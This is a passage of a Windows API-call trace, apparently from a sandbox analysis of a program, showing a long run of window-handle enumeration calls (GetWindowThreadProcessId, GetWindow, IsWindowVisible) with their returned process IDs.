	[0631.755] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x14ec
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfcc
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12ac
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1484
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x934
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc0c
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb08
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x948
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1178
	[0631.756] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13e0
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xcd0
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13fc
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdc8
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc18
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc2c
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa1c
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1244
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdb0
	[0631.757] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1398
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1358
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1370
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1340
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x130c
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12c0
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12e4
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1270
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1298
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x120c
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x122c
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11c4
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11b0
	[0631.758] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1188
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1148
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1160
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10fc
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe34
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xea4
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x514
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe48
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbc8
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdf8
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x318
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xcac
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x8bc
	[0631.759] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf9c
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf48
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe40
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xecc
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xeb8
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe80
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe98
	[0631.760] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe60
	[0631.761] GetWindow (hWnd=0x10400, uCmd=0x4) returned 0x0
	[0631.761] IsWindowVisible (hWnd=0x10400) returned 0
	[0631.761] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xee4
	[0631.761] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf00
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdf0
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe1c
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdd0
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd94
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd74
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd00
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xcd8
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc84
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xca4
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc64
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc24
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb84
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbac
	[0631.762] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x384
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xab8
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x33c
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa44
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa64
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x8a8
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xaf0
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x88c
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb04
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x910
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x230
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xac0
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xab4
	[0631.763] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xaac
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x3d0
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x978
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa7c
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x59c
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa88
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa6c
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa68
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x9f8
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa04
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x924
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x8dc
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x7dc
	[0631.764] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x768
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x764
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x820
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x810
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x794
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x83c
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x7ac
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb44
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb5c
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x838
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.765] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x818
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x5b8
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x494
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1ec
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x440
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x7e8
	[0631.766] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x730
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x2c8
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x31c
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x330
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x128
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x5c8
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x6f8
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x358
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x73c
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb0
	[0631.767] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x250
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x240
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x790
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x61c
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x540
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x538
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x568
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x538
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x568
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x538
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x540
	[0631.768] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x540
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x57c
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x460
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x554
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x528
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x79c
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4e0
	[0631.769] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x460
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x460
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x44c
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x778
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x460
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x558
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1bb4
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10bc
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b50
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x14b4
	[0631.770] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x149c
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x14a8
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1490
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x14a4
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x148c
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1458
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b4c
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b3c
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x19bc
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x199c
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1998
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1994
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1990
	[0631.771] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1984
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x197c
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1978
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1824
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1088
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1908
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x18cc
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x18d0
	[0631.772] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1840
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10c4
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x128c
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16e8
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16cc
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x274
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10e0
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10cc
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10c0
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10d0
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1198
	[0631.773] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1080
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1074
